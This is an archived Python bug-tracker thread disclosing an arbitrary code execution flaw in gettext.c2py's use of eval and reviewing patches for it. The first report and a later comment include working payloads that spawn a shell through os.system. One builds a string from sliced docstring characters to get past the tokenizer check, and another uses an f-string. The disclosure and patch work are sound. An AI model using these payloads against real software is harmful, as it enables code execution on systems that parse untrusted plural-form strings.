[issue28563] Arbitrary code execution in gettext.c2py

2016-11-08 Thread Carl Ekerot

Carl Ekerot added the comment:

Looks good to me. It behaves as intended on every input I can think of.

--

___
Python tracker <rep...@bugs.python.org>
<http://bugs.python.org/issue28563>
___
___
Python-bugs-list mailing list
Unsubscribe: 
https://mail.python.org/mailman/options/python-bugs-list/archive%40mail-archive.com



[issue28563] Arbitrary code execution in gettext.c2py

2016-11-07 Thread Carl Ekerot

Carl Ekerot added the comment:

Judging by the code, this seems to be a much more rigid implementation. I've 
only run the unit tests and some variations of my initial examples, and 
everything seems to work as intended. Will look at it more closely this 
afternoon.

One thing that caught my attention in the patch is that gettext.c2py is removed 
entirely. I know that this function is not exposed in the docs or in __all__, 
but it still has "public scope" and it's likely used directly in the wild 
(googling the signature confirms this). Perhaps it should give a 
DeprectationWarning and delegate to _Plural?

--

___
Python tracker <rep...@bugs.python.org>
<http://bugs.python.org/issue28563>
___
___
Python-bugs-list mailing list
Unsubscribe: 
https://mail.python.org/mailman/options/python-bugs-list/archive%40mail-archive.com



[issue28563] Arbitrary code execution in gettext.c2py

2016-11-05 Thread Carl Ekerot

Carl Ekerot added the comment:

> The gettext module might be vulnerable to f-string attacks

It is. See the example in the first comment:

   gettext.c2py('f"{os.system(\'sh\')}"')(0)

This vulnerability seems to be solved in Xiang's patch. The DoS aspect is 
interesting though, since there's no constraints against malicious use of the 
power-operator, say "9**9**9**..**9". This too would be solved by implementing 
a parser with only simple arithmetics.

--

___
Python tracker <rep...@bugs.python.org>
<http://bugs.python.org/issue28563>
___
___
Python-bugs-list mailing list
Unsubscribe: 
https://mail.python.org/mailman/options/python-bugs-list/archive%40mail-archive.com



[issue28563] Arbitrary code execution in gettext.c2py

2016-11-05 Thread Carl Ekerot

Carl Ekerot added the comment:

Verified gettext.c2py with gettext_c2py.patch applied agains the plural forms 
actually used in localization, listed over at 
http://docs.translatehouse.org/projects/localization-guide/en/latest/l10n/pluralforms.html.
 I tested all of the none-trivial forms, and from what I can tell they generate 
valid syntax and are correct.

--

___
Python tracker <rep...@bugs.python.org>
<http://bugs.python.org/issue28563>
___
___
Python-bugs-list mailing list
Unsubscribe: 
https://mail.python.org/mailman/options/python-bugs-list/archive%40mail-archive.com



[issue28563] Arbitrary code execution in gettext.c2py

2016-11-04 Thread Carl Ekerot

Carl Ekerot added the comment:

It doesn't solve the case when an identifier or number is used as a function:

   >>> import os
   >>> gettext.c2py("n()")(lambda: os.system("sh"))
   $ 
   0
   >>> gettext.c2py("1()")(0)
   Traceback (most recent call last):
 File "", line 1, in 
 File "", line 1, in 
   TypeError: 'int' object is not callable

This is more of an unintended behavior than a security issue.

Xiang Zhang: I've created a patch based on yours which handles the above case. 
I've also added a corresponding test case.

Imo it would be even better if we could avoid eval. One possible (and safe) way 
would be to construct a safe subset of Python using the ast module. This would 
however still require that the C-style syntax is translated to Python. As you 
mention, there are issues parsing and translating nested ternary operators, and 
I doubt it will be possible to cover all cases with the regex replace utilized 
today.

--
Added file: http://bugs.python.org/file45349/gettext_c2py_func.patch

___
Python tracker <rep...@bugs.python.org>
<http://bugs.python.org/issue28563>
___
___
Python-bugs-list mailing list
Unsubscribe: 
https://mail.python.org/mailman/options/python-bugs-list/archive%40mail-archive.com



[issue28563] Arbitrary code execution in gettext.c2py

2016-10-30 Thread Carl Ekerot

New submission from Carl Ekerot:

The c2py-function in the gettext module is seriously flawed in many ways due
to its use of eval to create a plural function:

   return eval('lambda n: int(%s)' % plural)

My first discovery was that nothing prevents an input plural string that
resembles a function call:

   gettext.c2py("n()")(lambda: os.system("sh"))

This is of course a low risk bug, since it requires control of both the plural
function string and the argument.

Gaining arbitrary code execution using only the plural function string requires
that the security checks are bypassed. The security checks utilize the tokenize
module and makes sure that no NAME-tokens that are not "n" exist in the string.
However, it does not check if the parser succeeds without any token.ERRORTOKEN
being present. Hence, the following input will pass the security checks:

   gettext.c2py( '"(eval(foo) && ""'  )(0)

   > 1 gettext.c2py( '"(eval(foo) && ""'  )(0)
   gettext.pyc in (n)
   NameError: global name 'foo' is not defined

It will pass since it recognizes the entire input as a STRING token, and
subsequently fails with an ERRORTOKEN.

Passing a string in the argument to eval will however break the exploit since
the parser will read the start-of-string in the eval argument as end-of-string,
and the eval argument will be read as a NAME-token.

Instead of passing a string to eval, we can build a string from characters in
the docstrings available in the context of the gettext module:

   gettext.c2py('"(eval('
   'os.__doc__[152:155] + ' # os.
   'os.__doc__[46:52] + '   # system
   'os.__doc__[318] + ' # (
   'os.__doc__[55] + '  # '
   'os.__doc__[10] + '  # s
   'os.__doc__[42] + '  # h
   'os.__doc__[55] + '  # '
   'os.__doc__[329]'# )
   ') && ""')(0)

This will successfully spawn a shell in Python 2.7.11.

Bonus: With the new string interpolation in Python 3.7, exploiting gettext.c2py
becomes trivial:

   gettext.c2py('f"{os.system(\'sh\')}"')(0)

The tokenizer will recognize the entire format-string as just a string, thus
bypassing the security checks.

To mitigate these vulnerabilities, eval should be avoided by implementing a
custom parser for the gettext plural function DSL.

--
components: Library (Lib)
messages: 279734
nosy: Carl Ekerot
priority: normal
severity: normal
status: open
title: Arbitrary code execution in gettext.c2py
type: security
versions: Python 2.7, Python 3.3, Python 3.4, Python 3.5, Python 3.6, Python 3.7

___
Python tracker <rep...@bugs.python.org>
<http://bugs.python.org/issue28563>
___
___
Python-bugs-list mailing list
Unsubscribe: 
https://mail.python.org/mailman/options/python-bugs-list/archive%40mail-archive.com